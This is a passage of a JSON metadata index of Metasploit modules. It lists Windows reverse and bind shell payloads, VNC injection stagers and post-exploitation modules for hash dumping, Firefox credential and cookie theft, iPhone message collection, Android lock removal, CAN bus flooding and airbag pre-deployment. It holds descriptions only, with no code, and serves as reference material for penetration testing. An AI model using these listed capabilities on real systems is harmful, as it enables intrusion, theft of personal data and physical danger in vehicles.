"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Listen for a connection and spawn a command shell (Windows x64)",
"references": [
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/x64/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/shell_reverse_tcp": {
"name": "Windows x64 Command Shell, Reverse TCP Inline",
"full_name": "payload/windows/x64/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Connect back to attacker and spawn a command shell (Windows x64)",
"references": [
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/vncinject/bind_ipv6_tcp": {
"name": "Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager",
"full_name": "payload/windows/x64/vncinject/bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for an IPv6 connection (Windows x64)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/vncinject/bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/vncinject/bind_ipv6_tcp_uuid": {
"name": "Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support",
"full_name": "payload/windows/x64/vncinject/bind_ipv6_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for an IPv6 connection with UUID Support (Windows x64)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/x64/vncinject/bind_ipv6_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/vncinject/bind_named_pipe": {
"name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager",
"full_name": "payload/windows/x64/vncinject/bind_named_pipe",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"UserExistsError"
],
"description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a pipe connection (Windows x64)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 17:37:33 +0000",
"path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb",
"is_install_path": true,
"ref_name": "windows/x64/vncinject/bind_named_pipe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/vncinject/bind_tcp": {
"name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager",
"full_name": "payload/windows/x64/vncinject/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a connection (Windows x64)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/vncinject/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/vncinject/bind_tcp_uuid": {
"name": "Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)",
"full_name": "payload/windows/x64/vncinject/bind_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a connection with UUID Support (Windows x64)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/x64/vncinject/bind_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/vncinject/reverse_http": {
"name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)",
"full_name": "payload/windows/x64/vncinject/reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 wininet)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-03-20 11:27:43 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_http.rb",
"is_install_path": true,
"ref_name": "windows/x64/vncinject/reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/vncinject/reverse_https": {
"name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)",
"full_name": "payload/windows/x64/vncinject/reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"agix",
"rwincey"
],
"description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 wininet)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-03-20 11:27:43 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_https.rb",
"is_install_path": true,
"ref_name": "windows/x64/vncinject/reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/vncinject/reverse_tcp": {
"name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager",
"full_name": "payload/windows/x64/vncinject/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker (Windows x64)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/vncinject/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/vncinject/reverse_tcp_rc4": {
"name": "Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/x64/vncinject/reverse_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"mihi",
"max3raza",
"RageLtMan"
],
"description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-03-04 17:43:15 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/x64/vncinject/reverse_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/x64/vncinject/reverse_tcp_uuid": {
"name": "Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)",
"full_name": "payload/windows/x64/vncinject/reverse_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker with UUID Support (Windows x64)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/x64/vncinject/reverse_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/vncinject/reverse_winhttp": {
"name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)",
"full_name": "payload/windows/x64/vncinject/reverse_winhttp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 winhttp)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-03-20 11:27:43 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_winhttp.rb",
"is_install_path": true,
"ref_name": "windows/x64/vncinject/reverse_winhttp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/vncinject/reverse_winhttps": {
"name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)",
"full_name": "payload/windows/x64/vncinject/reverse_winhttps",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTPS (Windows x64 winhttp)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-03-20 11:27:43 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_winhttps.rb",
"is_install_path": true,
"ref_name": "windows/x64/vncinject/reverse_winhttps",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_aix/hashdump": {
"name": "AIX Gather Dump Password Hashes",
"full_name": "post/aix/hashdump",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "Post Module to dump the password hashes for all users on an AIX System",
"references": [
],
"platform": "AIX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/aix/hashdump.rb",
"is_install_path": true,
"ref_name": "aix/hashdump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_android/capture/screen": {
"name": "Android Screen Capture",
"full_name": "post/android/capture/screen",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"timwr"
],
"description": "This module takes a screenshot of the target phone.",
"references": [
],
"platform": "Android",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/android/capture/screen.rb",
"is_install_path": true,
"ref_name": "android/capture/screen",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_android/gather/sub_info": {
"name": "extracts subscriber info from target device",
"full_name": "post/android/gather/sub_info",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Auxilus"
],
"description": "This module displays the subscriber info stored on the target phone.\n It uses the call service to get the value of each transaction code (e.g. IMEI).",
"references": [
],
"platform": "Android",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-10-01 16:54:46 +0000",
"path": "/modules/post/android/gather/sub_info.rb",
"is_install_path": true,
"ref_name": "android/gather/sub_info",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_android/gather/wireless_ap": {
"name": "Displays wireless SSIDs and PSKs",
"full_name": "post/android/gather/wireless_ap",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Auxilus",
"timwr"
],
"description": "This module displays all wireless AP creds saved on the target device.",
"references": [
],
"platform": "Android",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-06 17:37:12 +0000",
"path": "/modules/post/android/gather/wireless_ap.rb",
"is_install_path": true,
"ref_name": "android/gather/wireless_ap",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_android/manage/remove_lock": {
"name": "Android Settings Remove Device Locks (4.0-4.3)",
"full_name": "post/android/manage/remove_lock",
"rank": 300,
"disclosure_date": "2013-10-11",
"type": "post",
"author": [
"CureSec",
"timwr"
],
"description": "This module exploits a bug in the Android 4.0 to 4.3 com.android.settings.ChooseLockGeneric class.\n Any unprivileged app can exploit this vulnerability to remove the lockscreen.\n A logic flaw / design error exists in the settings application that allows an Intent from any\n application to clear the screen lock. The user may see that the Settings application has crashed,\n and the phone can then be unlocked by a swipe.\n This vulnerability was patched in Android 4.4.",
"references": [
"CVE-2013-6271",
"URL-http://blog.curesec.com/article/blog/26.html",
"URL-http://www.curesec.com/data/advisories/Curesec-2013-1011.pdf"
],
"platform": "Android",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/android/manage/remove_lock.rb",
"is_install_path": true,
"ref_name": "android/manage/remove_lock",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_android/manage/remove_lock_root": {
"name": "Android Root Remove Device Locks (root)",
"full_name": "post/android/manage/remove_lock_root",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"timwr"
],
"description": "This module uses root privileges to remove the device lock.\n In some cases the original lock method will still be present but any key/gesture will\n unlock the device.",
"references": [
],
"platform": "Android",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/android/manage/remove_lock_root.rb",
"is_install_path": true,
"ref_name": "android/manage/remove_lock_root",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_apple_ios/gather/ios_image_gather": {
"name": "iOS Image Gatherer",
"full_name": "post/apple_ios/gather/ios_image_gather",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Shelby Pace"
],
"description": "This module collects images from iPhones.\n Module was tested on iOS 10.3.3 on an iPhone 5.",
"references": [
],
"platform": "Apple_iOS",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-11-02 08:01:15 +0000",
"path": "/modules/post/apple_ios/gather/ios_image_gather.rb",
"is_install_path": true,
"ref_name": "apple_ios/gather/ios_image_gather",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_apple_ios/gather/ios_text_gather": {
"name": "iOS Text Gatherer",
"full_name": "post/apple_ios/gather/ios_text_gather",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Shelby Pace"
],
"description": "This module collects text messages from iPhones.\n Tested on iOS 10.3.3 on an iPhone 5.",
"references": [
],
"platform": "Apple_iOS",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-11-02 08:01:15 +0000",
"path": "/modules/post/apple_ios/gather/ios_text_gather.rb",
"is_install_path": true,
"ref_name": "apple_ios/gather/ios_text_gather",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_cisco/gather/enum_cisco": {
"name": "Cisco Gather Device General Information",
"full_name": "post/cisco/gather/enum_cisco",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module collects Cisco IOS or NXOS device information and configuration.",
"references": [
],
"platform": "Cisco",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/cisco/gather/enum_cisco.rb",
"is_install_path": true,
"ref_name": "cisco/gather/enum_cisco",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_firefox/gather/cookies": {
"name": "Firefox Gather Cookies from Privileged Javascript Shell",
"full_name": "post/firefox/gather/cookies",
"rank": 300,
"disclosure_date": "2014-03-26",
"type": "post",
"author": [
"joev <joev@metasploit.com>"
],
"description": "This module allows collection of cookies from a Firefox Privileged Javascript Shell.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/firefox/gather/cookies.rb",
"is_install_path": true,
"ref_name": "firefox/gather/cookies",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_firefox/gather/history": {
"name": "Firefox Gather History from Privileged Javascript Shell",
"full_name": "post/firefox/gather/history",
"rank": 300,
"disclosure_date": "2014-04-11",
"type": "post",
"author": [
"joev <joev@metasploit.com>"
],
"description": "This module allows collection of the entire browser history from a Firefox\n Privileged Javascript Shell.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/firefox/gather/history.rb",
"is_install_path": true,
"ref_name": "firefox/gather/history",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_firefox/gather/passwords": {
"name": "Firefox Gather Passwords from Privileged Javascript Shell",
"full_name": "post/firefox/gather/passwords",
"rank": 300,
"disclosure_date": "2014-04-11",
"type": "post",
"author": [
"joev <joev@metasploit.com>"
],
"description": "This module allows collection of passwords from a Firefox Privileged Javascript Shell.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/firefox/gather/passwords.rb",
"is_install_path": true,
"ref_name": "firefox/gather/passwords",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_firefox/gather/xss": {
"name": "Firefox XSS",
"full_name": "post/firefox/gather/xss",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"joev <joev@metasploit.com>"
],
"description": "This module runs the provided SCRIPT as javascript in the\n origin of the provided URL. It works by navigating to a hidden\n ChromeWindow to the URL, then injecting the SCRIPT with Function().\n The callback \"send(result)\" is used to send data back to the listener.",
"references": [
],
"platform": "Firefox",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/firefox/gather/xss.rb",
"is_install_path": true,
"ref_name": "firefox/gather/xss",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_firefox/manage/webcam_chat": {
"name": "Firefox Webcam Chat on Privileged Javascript Shell",
"full_name": "post/firefox/manage/webcam_chat",
"rank": 300,
"disclosure_date": "2014-05-13",
"type": "post",
"author": [
"joev <joev@metasploit.com>"
],
"description": "This module allows streaming a webcam from a privileged Firefox Javascript shell.",
"references": [
"URL-http://www.rapid7.com/db/modules/exploit/firefox/local/exec_shellcode"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/firefox/manage/webcam_chat.rb",
"is_install_path": true,
"ref_name": "firefox/manage/webcam_chat",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_hardware/automotive/can_flood": {
"name": "CAN Flood",
"full_name": "post/hardware/automotive/can_flood",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Pietro Biondi"
],
"description": "This module floods a CAN interface with supplied frames.",
"references": [
],
"platform": "Hardware",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-01 12:04:31 +0000",
"path": "/modules/post/hardware/automotive/can_flood.rb",
"is_install_path": true,
"ref_name": "hardware/automotive/can_flood",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_hardware/automotive/canprobe": {
"name": "Module to Probe Different Data Points in a CAN Packet",
"full_name": "post/hardware/automotive/canprobe",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Craig Smith"
],
"description": "Scans between two CAN IDs and writes data at each byte position. It will\n either write a set byte value (Default 0xFF) or iterate through all possible values\n of that byte position (takes much longer). Does not check for responses and is\n basically a simple blind fuzzer.",
"references": [
],
"platform": "Hardware",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/hardware/automotive/canprobe.rb",
"is_install_path": true,
"ref_name": "hardware/automotive/canprobe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_hardware/automotive/getvinfo": {
"name": "Get the Vehicle Information Such as the VIN from the Target Module",
"full_name": "post/hardware/automotive/getvinfo",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Craig Smith"
],
"description": "Post Module to query DTCs, some common engine info and vehicle info.\n It returns such things as engine speed, coolant temp, Diagnostic\n Trouble Codes, as well as all info stored by Mode $09 Vehicle Info (VIN, etc.).",
"references": [
],
"platform": "Hardware",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-11 18:20:57 +0000",
"path": "/modules/post/hardware/automotive/getvinfo.rb",
"is_install_path": true,
"ref_name": "hardware/automotive/getvinfo",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_hardware/automotive/identifymodules": {
"name": "Scan CAN Bus for Diagnostic Modules",
"full_name": "post/hardware/automotive/identifymodules",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Craig Smith"
],
"description": "Post Module to scan the CAN bus for any modules that can respond to UDS DSC queries",
"references": [
],
"platform": "Hardware",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/hardware/automotive/identifymodules.rb",
"is_install_path": true,
"ref_name": "hardware/automotive/identifymodules",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_hardware/automotive/malibu_overheat": {
"name": "Sample Module to Flood Temp Gauge on 2006 Malibu",
"full_name": "post/hardware/automotive/malibu_overheat",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Craig Smith"
],
"description": "Simple sample temp flood for the 2006 Malibu",
"references": [
],
"platform": "Hardware",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/hardware/automotive/malibu_overheat.rb",
"is_install_path": true,
"ref_name": "hardware/automotive/malibu_overheat",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_hardware/automotive/pdt": {
"name": "Check For and Prep the Pyrotechnic Devices (Airbags, Battery Clamps, etc.)",
"full_name": "post/hardware/automotive/pdt",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Johannes Braun",
"Juergen Duerrwang",
"Craig Smith"
],
"description": "Acting in the role of a Pyrotechnical Device Deployment Tool (PDT), this module\n will first query all Pyrotechnic Control Units (PCUs) in the target vehicle\n to discover how many pyrotechnic devices are present, then attempt to validate\n the security access token using the default simplified algorithm. On success,\n the vehicle will be in a state that is prepped to deploy its pyrotechnic devices\n (e.g. airbags, battery clamps, etc.) via the service routine. (ISO 26021)",
"references": [
"CVE-2017-14937",
"URL-https://www.researchgate.net/publication/321183727_Security_Evaluation_of_an_Airbag-ECU_by_Reusing_Threat_Modeling_Artefacts"
],
"platform": "Hardware",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-12-17 18:15:49 +0000",
"path": "/modules/post/hardware/automotive/pdt.rb",
"is_install_path": true,
"ref_name": "hardware/automotive/pdt",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_hardware/rftransceiver/rfpwnon": {
"name": "Brute Force AM/OOK (ie: Garage Doors)",
"full_name": "post/hardware/rftransceiver/rfpwnon",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Craig Smith"
],
"description": "Post Module for HWBridge RFTransceivers. Brute forces AM OOK or raw\n binary signals. This is a port of the rfpwnon tool by Corey Harding.\n (https://github.com/exploitagency/github-rfpwnon/blob/master/rfpwnon.py)",
"references": [
],
"platform": "Hardware",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/hardware/rftransceiver/rfpwnon.rb",
"is_install_path": true,
"ref_name": "hardware/rftransceiver/rfpwnon",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_hardware/rftransceiver/transmitter": {
"name": "RF Transceiver Transmitter",
"full_name": "post/hardware/rftransceiver/transmitter",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Craig Smith"
],
"description": "This module powers an HWBridge-connected radio transceiver,\n effectively transmitting on the frequency set by the FREQ option.\n\n NOTE: Users of this module should be aware of their local laws,\n regulations, and licensing requirements for transmitting on any\n given radio frequency.",
"references": [
"URL-https://github.com/AndrewMohawk/RfCatHelpers"
],
"platform": "Hardware",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/hardware/rftransceiver/transmitter.rb",
"is_install_path": true,
"ref_name": "hardware/rftransceiver/transmitter",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_hardware/zigbee/zstumbler": {
"name": "Sends Beacons to Scan for Active ZigBee Networks",
"full_name": "post/hardware/zigbee/zstumbler",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Craig Smith"
],
"description": "Post Module to send beacon signals to the broadcast address while\n channel hopping",
"references": [
],
"platform": "Hardware",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/hardware/zigbee/zstumbler.rb",
"is_install_path": true,
"ref_name": "hardware/zigbee/zstumbler",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_juniper/gather/enum_juniper": {
"name": "Juniper Gather Device General Information",
"full_name": "post/juniper/gather/enum_juniper",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"h00die"
],
"description": "This module collects Juniper ScreenOS and JunOS device information and configuration.",
"references": [
],
"platform": "Juniper",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-07-30 14:20:01 +0000",
"path": "/modules/post/juniper/gather/enum_juniper.rb",
"is_install_path": true,
"ref_name": "juniper/gather/enum_juniper",
"check": false,
